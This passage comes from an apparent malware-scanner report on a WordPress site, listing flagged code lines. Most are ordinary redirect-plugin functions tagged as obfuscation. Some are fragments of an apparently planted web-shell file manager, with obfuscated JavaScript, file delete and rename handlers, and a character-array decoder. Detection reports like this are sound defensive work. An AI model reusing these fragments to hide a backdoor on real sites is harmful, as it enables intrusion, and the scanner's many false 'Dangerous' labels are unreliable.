</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 651</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_panel_cache</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 655</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_panel_donate</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 660</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_tab_redirects</span><span style="color: #007700">(</span><span style="color: #0000BB">$options</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 664</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_tab_404s</span><span style="color: #007700">(</span><span style="color: #0000BB">$options</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 668</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_tab_support</span><span style="color: #007700">(</span><span style="color: #0000BB">$options</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 672</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_tab_link_scanner</span><span style="color: #007700">(</span><span style="color: #0000BB">$options</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 676</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_tab_import_export</span><span style="color: #007700">(</span><span style="color: #0000BB">$options</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_tab_error</span><span style="color: #007700">(</span><span style="color: #0000BB">$options</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 697</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">config</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 699</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (isset(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">config</span><span style="color: #007700">[</span><span style="color: #0000BB">$name</span><span style="color: #007700">])) ? </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">config</span><span style="color: #007700">[</span><span style="color: #0000BB">$name</span><span style="color: #007700">] : </span><span style="color: #0000BB">false</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 703</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_current_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 705</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">version_compare</span><span style="color: #007700">(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">current_version</span><span style="color: #007700">(), </span><span style="color: #0000BB">EPS_REDIRECT_VERSION</span><span style="color: #007700">, </span><span style="color: #DD0000">'='</span><span style="color: #007700">) ? </span><span style="color: #0000BB">true </span><span style="color: #007700">: </span><span style="color: #0000BB">false</span><span style="color: #007700">; </span><span style="color: #FF8000">// TODO decouple</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 707</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">current_version</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 709</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">get_option</span><span style="color: #007700">(</span><span style="color: #DD0000">'eps_redirects_version'</span><span style="color: #007700">); </span><span style="color: #FF8000">// TODO decouple</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 711</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_current_version</span><span style="color: #007700">(</span><span style="color: #0000BB">$version</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 721</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions will output a variable containing the admin ajax url </span><span style="color: #007700">for use </span><span style="color: #0000BB">in javascript</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 726</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_admin_message</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$code</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 732</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">display_admin_messages</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 747</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">admin_notice</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">"updated"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 758</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">protect_from_translation_plugins</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 79</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">resource_path</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$resource</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 81</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 88</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">resource_name</span><span style="color: #007700">(</span><span style="color: #0000BB">$resource</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 90</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">name </span><span style="color: #007700">. </span><span style="color: #DD0000">'_' </span><span style="color: #007700">. </span><span style="color: #0000BB">key</span><span style="color: #007700">(</span><span style="color: #0000BB">$resource</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 93</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_activation</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_224").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/contact-1769473375/misc/archives_1769473375.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.04 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-27 02:23:17</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 22</span><br><table id="file_225" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 109</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$__</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit double_var2 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 56</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Double var technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">${</span><span style="color: #0000BB">$_</span><span style="color: #007700">}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() { if (</span><span style="color: #0000BB">confirm</span><span style="color: #007700">(</span><span style="color: #DD0000">'Delete?'</span><span style="color: #007700">)) </span><span style="color: #0000BB">_0x02</span><span style="color: #007700">(</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x17</span><span style="color: #007700">), </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-path'</span><span style="color: #007700">)); }); }); </span><span style="color: #0000BB">document</span><span style="color: #007700">.</span><span style="color: #0000BB">querySelectorAll</span><span style="color: #007700">(</span><span style="color: #DD0000">'.rename-btn'</span><span style="color: #007700">).forEach(</span><span style="color: #0000BB">_0x9b </span><span style="color: #007700">=> { </span><span style="color: #0000BB">_0x9b</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0xf</span><span style="color: #007700">)](</span><span style="color: #0000BB">_0x4b12</span><span style="color: #007700">(</span><span style="color: #0000BB">0x11</span><span style="color: #007700">), function() { const </span><span style="color: #0000BB">_0xname </span><span style="color: #007700">= </span><span style="color: #0000BB">prompt</span><span style="color: #007700">(</span><span style="color: #DD0000">'New name:'</span><span style="color: #007700">, </span><span style="color: #0000BB">this</span><span style="color: #007700">.</span><span style="color: #0000BB">getAttribute</span><span style="color: #007700">(</span><span style="color: #DD0000">'data-</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 13</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_absolute_root</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 173</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 176</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x2c</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 177</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">_0x5f2e</span><span style="color: #007700">[</span><span style="color: #0000BB">_0x1b</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 17</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$script_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">);}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 180</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">_0x54</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x32</span><span style="color: #007700">, </span><span style="color: #0000BB">_0x1a</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 18</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'\\'</span><span style="color: #007700">, </span><span style="color: #DD0000">'/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">]), </span><span style="color: #DD0000">'/'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 23</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">displayPathItem</span><span style="color: #007700">(</span><span style="color: #0000BB">$title</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">) {print </span><span style="color: #DD0000">"<div class='path-nav'><strong></span><span style="color: #007700">{</span><span style="color: #0000BB">$title</span><span style="color: #007700">}</span><span style="color: #DD0000">:</strong>" </span><span style="color: #007700">. </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #DD0000">"</div>"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 26</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">PathCl</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 41</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">' / '</span><span style="color: #007700">, </span><span style="color: #0000BB">$breadcrumbs</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 44</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getPermissions</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 48</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"</span><span style="color: #0000BB">$readable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$writable</span><span style="color: #DD0000"> </span><span style="color: #0000BB">$executable</span><span style="color: #DD0000">"</span><span style="color: #007700">;}</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">Result</span><span style="color: #007700">(</span><span style="color: #0000BB">$Int</span><span style="color: #007700">) {</span><span style="color: #0000BB">$I</span><span style="color: #007700">=array(</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'P'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'T'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'M'</span><span style="color: #007700">,</span><span style="color: #DD0000">'V'</span><span style="color: #007700">,</span><span style="color: #DD0000">'h'</span><span style="color: #007700">,</span><span style="color: #DD0000">'E'</span><span style="color: #007700">,</span><span style="color: #DD0000">'L'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'0'</span><span style="color: #007700">,</span><span style="color: #DD0000">'K'</span><span style="color: #007700">,</span><span style="color: #DD0000">'8'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'l'</span><span style="color: #007700">,</span><span style="color: #DD0000">'a'</span><span style="color: #007700">,</span><span style="color: #DD0000">'U'</span><span style="color: #007700">,</span><span style="color: #DD0000">'D'</span><span style="color: #007700">,</span><span style="color: #DD0000">'e'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'I'</span><span style="color: #007700">,</span><span style="color: #DD0000">'m'</span><span style="color: #007700">,</span><span style="color: #DD0000">'1'</span><span style="color: #007700">,</span><span style="color: #DD0000">'5'</span><span style="color: #007700">,</span><span style="color: #DD0000">'s'</span><span style="color: #007700">,</span><span style="color: #DD0000">'b'</span><span style="color: #007700">,</span><span style="color: #DD0000">'R'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'O'</span><span style="color: #007700">,</span><span style="color: #DD0000">'u'</span><span style="color: #007700">,</span><span style="color: #DD0000">'W'</span><span style="color: #007700">,</span><span style="color: #DD0000">'X'</span><span style="color: #007700">,</span><span style="color: #DD0000">'Z'</span><span style="color: #007700">,</span><span style="color: #DD0000">'+'</span><span style="color: #007700">,</span><span style="color: #DD0000">'c'</span><span style="color: #007700">,</span><span style="color: #DD0000">'@'</span><span style="color: #007700">,</span><span style="color: #DD0000">'d'</span><span style="color: #007700">,</span><span style="color: #DD0000">'3'</span><span style="color: #007700">,</span><span style="color: #DD0000">'r'</span><span style="color: #007700">,</span><span style="color: #DD0000">'F'</span><span style="color: #007700">,</span><span style="color: #DD0000">')'</span><span style="color: #007700">,</span><span style="color: #DD0000">'B'</span><span style="color: #007700">,</span><span style="color: #DD0000">'y'</span><span style="color: #007700">,</span><span style="color: #DD0000">'C'</span><span style="color: #007700">,</span><span style="color: #DD0000">'J'</span><span style="color: #007700">,</span><span style="color: #DD0000">'q'</span><span style="color: #007700">,</span><span style="color: #DD0000">'G'</span><span style="color: #007700">,</span><span style="color: #DD0000">'#'</span><span style="color: #007700">,</span><span style="color: #DD0000">'S'</span><span style="color: #007700">,</span><span style="color: #DD0000">'o'</span><span style="color: #007700">,</span><span style="color: #DD0000">'H'</span><span style="color: #007700">,</span><span style="color: #DD0000">'4'</span><span style="color: #007700">,</span><span style="color: #DD0000">'A'</span><span style="color: #007700">,</span><span style="color: #DD0000">'i'</span><span style="color: #007700">,</span><span style="color: #DD0000">'j'</span><span style="color: #007700">,</span><span style="color: #DD0000">'t'</span><span style="color: #007700">,</span><span style="color: #DD0000">'v'</span><span style="color: #007700">,</span><span style="color: #DD0000">'w'</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 50</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">formatFileSize</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 51</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">round</span><span style="color: #007700">(</span><span style="color: #0000BB">$bytes </span><span style="color: #007700">/ </span><span style="color: #0000BB">1073741824</span><span style="color: #007700">, </span><span style="color: #0000BB">2</span><span style="color: #007700">) . </span><span style="color: #DD0000">' GB'</span><span style="color: #007700">; }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 52</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
